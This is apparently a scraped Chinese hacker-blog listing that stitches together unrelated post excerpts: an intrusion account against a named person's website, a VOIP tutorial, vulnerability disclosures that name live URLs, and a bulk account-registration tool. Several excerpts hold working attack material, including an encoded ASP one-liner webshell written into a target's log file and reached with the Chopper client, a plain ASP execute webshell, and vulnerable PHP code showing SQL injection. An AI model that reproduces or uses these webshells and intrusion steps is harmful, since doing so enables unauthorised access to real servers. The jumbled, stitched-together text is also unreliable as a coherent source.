Written by 1、《鸟哥的私房菜(服务器架设篇)》 10%
2、《黑客与画家》 50%
3、《史蒂夫·乔布斯传》 完!
4、《黑客大曝光:Web应用程序安全(原书第三版)》 READ MORE »
黑掉田众和全过程
第一次入侵
话说那个田众和炒的可谓沸沸扬扬,看了腾讯拍的采访,发现了许多可疑点,
视频字幕出现了雷人的一幕…(如图1)
懂技术的人都知道田众和所说的其实是js、css、ajax,这三种网站建设中的前端语言,而字幕居然写成这样,可见制作视频的人从策划到编辑根本就没有 一个是懂得网络技术的人,因此田众和说什么对于这些不懂的视频制作人员来说都是可信的,因为他们不懂,他们的目标只是做出来一个网络热门话题,可奇怪的是 这个视频居然没有让田众和本人看一下吗?
小弟我看完这片子,感慨啊,12岁的小盆友,15天写出PE系统,这严重打击了我们这些学技术的叉子们….还说什么精通php,c语言。这孩子一看就是个忽悠…
看完片子后,立即打开那传说中的时代网络工作室,对,是php做的。嗯,也没什么低级注入,看到底部赫赫大字,网页程序by小田…我心想,难道我多疑了。这个是他写的?
不管,先扫一下后台再说…拿出我的6.5M的wwwscan,开始扫…..
这不是wp的目录吗(如图2)?赶紧去wp默认后台…
黑吧VOIP网络电话系统的搭建系列教程介绍与下载
大家好,我是黑吧的princelove,
现在给大家带来的是系列教程之:VOIP网络电话系统的搭建
这类的动画教程网上很少,基本没有,这里我就给大家详细的演示一遍……….
工具:
3CXPhoneSystem.exe 服务器安装
3CXPhone4.msi 客户端安装
uTing.exe 语音提示音生成工具
安装包过大,请大家自行网上下载。
服务器环境:推荐windows 2003/2008,xp也可以;Microsoft .NET Framework v2.0 以上
内存512M以上
客户机环境:windows xp、windows 7/8、windows 2000/2003/2008等
具体请看操作……我就不打字了。
第一节:初识网络电话及搭建需求
第二节:3cx服务端与客户机的配置
第三节:个性化服务-语音接待
第四节:个性化服务-来电转接
第五节:优化语音系统-汉化提示音
第六节:内网映射端口和域名连接3CX服务器
第七节:深入浅出-网络电话SIP协议抓包剖解
2
QQ交流群55174448,54952985
第一节、初识网络电话及搭建需求:
速成建站通杀漏洞:文件上传导致任意代码执行,直接秒杀服务器
漏洞详情
披露状态:
2012-05-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-17: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
程序设计上失误 没有完全判断上传后缀!
详细说明:
速成建站通杀漏洞,直接秒杀服务器!进去直接mysql最高权限 !危害这个你懂滴!
漏洞证明:
http://my.5uweb.com/coon.asp
服务器咱就不进了!!河蟹啊!
SQL通用防注入系统asp版漏洞
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
既然做了记录,再查看了下它的记录文件
于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的
┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a (加密方式是: ANSI->Unicode)
提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾
http://www.xxx.cn/sqlin.asp 菜刀连接之,成功
其实过程并不难,也没什么技术难度,但是有时遇到这种记录注入错误的网站,多个便捷途径还是不错的。
突破护卫神的菜刀一句话 & 一句话变形处理
<%Y=request("x")%> <%execute(Y)%>
asp的 密码为x
虚拟机报错:【无法打开内核设备“\\.\VMCIDev\VMX”: 系统找不到指定的文件】的解决办法
刚在xp上安装VMWare8.0.3,新建虚拟机出现这种错误:
无法打开内核设备“\\.\VMCIDev\VMX”: 系统找不到指定的文件。你想要在安装 VMware Workstation 前重启吗?
打开模块DevicePowerOn电源失败。
拍客piikee竞拍网站源码全局sql injection
主题:拍客piikee竞拍网站源码全局sql injection
作者:piaoye
版权:3EST信息安全团队 (www.3est.com)
0×01 简介
在乌云看以快拍拍网站充值BUG,就搜索了下这个网站,谷歌里有个类似的网站,程序注射一堆,然后就进去了。
0×02 配置并编译
php+mysql
0×03 实战应用
为什么说2B那?前台所有文件参数值都这样来的,大家看下这段代码
news_arc.php
<?php
define(‘IN_JP’,true);
require_once("./config/init.php");
$arcid = $_REQUEST["arcid"];
if($arcid!=""){
$qrynews2 = "select * from news where id = ".$arcid;
$objnews2=$GLOBALS['db']->get_one($qrynews2);
}else{
$objnews2="";
}
$qrycount = "select w.id,r.username,w.won_date,p.name,a.auc_final_price,a.auctionID,p.picture1,p.price,(100-100*a.auc_final_price/p.price) as discount,a.auctionID from won_auctions w left join auction a on w.auction_id=a.auctionID left join products p on a.productID=p.productID inner join registration r on w.userid = r.id where w.userid>=0 order by w.won_date desc limit 0,7 ";
$obj1 = $GLOBALS['db']->select($qrycount);
$smarty->assign("obj1",$obj1);
$smarty->assign("objnews2",$objnews2);
$smarty->display(‘news_arc.htm’);
?>
记事狗设计缺陷导致可以删除网站任意图片
路径处理不当导致注册用户可以删除网站上的任意图片
详细说明:
注册一个用户,登录后点击上传头像,比如地址为:
http://www.badguest.cn /jishigou30s/index.php?mod=settings&code=face
在最后面加上&temp_face=././images/noavatar.gif 再访问,然后我的头像那块就会加载这个图片,直接点击下面的“确认”,头像木有修改成功,但是noavatar.gif这个文件却被删掉了。
漏洞证明:
随便找个记事狗的站就可以证明了。(图片需要有可写权限)
修复方案:
对于前台输入的路径都进行强制判断并过滤
由于网站在上传头像完成时删除临时文件的判断不严格,造成此漏洞,感谢反馈,已经提供相应修复补丁,并更新相关下载。
详见:http://cenwor.com/thread-12847-1-1.html
作者 Moyo
IIS写权限利用续以及写权限漏洞来由解释
五年半前写了一篇文章:《再试IIS写权限以及move为asp的问题》,当时还留下一点问题,此文就是用来解决当年遗留的问题的。
很多人也许觉得IIS PUT这玩意不值一提啊…其实不然,身在乙方,给客户做安服的时候总是遇到IIS写权限的问题,一方面WVS7.0已经可以扫描并且使用POC成功写入漏洞目标,另一方面无聊的土耳其或者印度尼西亚黑客总是喜欢利用写权限上传txt或者html到漏洞目标,以示对方的hack技术的强大。
目前大家所见到的IIS写权限利用,其实说白了是菜鸟管理员对IIS的错误配置问题(2个错误配置造成):
1.WEB服务器扩展里设置WebDAV为允许;
2.网站权限配置里开启了写入权限。
至于WebDAV,看看百度百科的介绍:
WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议.它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可直接对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。
YY批量注册器 测试版
花了一下午的时间,写了个注册YY的程序,发布源码
VS2010开发,运行请确保已安装.net 2.0,部分功能完善中…
先发上来装个比证明我也是个小小程序猿
